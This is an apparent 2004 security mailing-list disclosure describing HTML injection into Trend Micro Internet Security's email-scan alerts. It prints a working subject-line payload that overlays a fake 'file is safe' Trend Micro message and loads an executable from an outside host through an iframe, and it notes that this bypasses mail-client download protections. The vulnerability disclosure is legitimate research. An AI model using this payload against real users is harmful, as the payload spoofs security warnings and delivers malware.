<<< Date Index >>>     <<< Thread Index >>>

TREND MICRO: The Protector Becomes The Vector Take II




Monday, June 07, 2004

 
<!-- 

1. When the product alerts it creates an html file in the 
temporary file of the user's machine [the so-called "local zone"]

[screen shot: http://www.malware.com/weallcar.png 29KB ]

This html file is viewed from an Internet Explorer "browser  
object" and
indicates what file is problematic.

-->

Further to the examination of this: 

[see: http://securityfocus.com/archive/1/365050/2004-05-28/2004-
06-03/0 ]

It may very well be that alert file while in the temporary 
folder does not in fact run under the so-called "My Computer" 
zone. Previous testing required irritatingly precise manual 
construction of the .zip file with test string therein by the 
counting off the amount of desired html characters to test 
against the name of the file in the .zip and manually modifying 
it accordingly.

While the overall html concept and problem is sound as 
demonstrated, we today find a much easier and default and 
perhaps even worse problem than before.

Incoming Email:

The gadget has a scanning mechanism for incoming email messages 
utilising the exact same alert scheme. In this instance 
everything is set on default and we need not enclose our "bait" 
in a container and fiddle for hours with its name.  We have a 
subject and a sender field. In this case we do like so:

Your Safe File<div 
style="position:absolute;top:25;left:10;height:300pt;width:300pt;
z-index:+100;font-family:Verdana;font-weight: bold;font-size: 
12pt;font-color:green">Trend Micro Internet Security confirms 
this file <br>malware.exe is safe to open. Proceed.</div><iframe 
src="http://www.malware.com/malware.exe";>

[screen shot: http://www.malware.com/micronot.png 33KB]

Which should be self-explanatory of only one possibility.

Notes:

1. Using this easier delivery and testing method <object> tag in 
the subject generates an activex warning plus <script>alert()
</script> fails; very strongly suggesting that despite the html 
file being in the local zone, the developers had the foresight 
to have their little Internet Explorer control set at the high 
setting regardless of zoning [might be other reasons including 
these being email vs. web]. Nevertheless:

2. The whole thing is still broken though as frames and images 
render as they should. This completely defeats the security of 
Outlook Express and Outlook which disallow  file downloads, 
external content downloading etc. which this allows on arrival
of the email [not even opening it].

3. Cramming everything into the subject field and modifying 
warning messages as above, all while on default settings can 
prove just as lucrative.

4. There is always away around the mighty Internet Explorer's so-
called 'Security Zone's if not today, then tomorrow.

5. This html 'thing' in the alert mechanism really ought to be 
fixed as soon as possible.


End Call


 

-- 
http://www.malware.com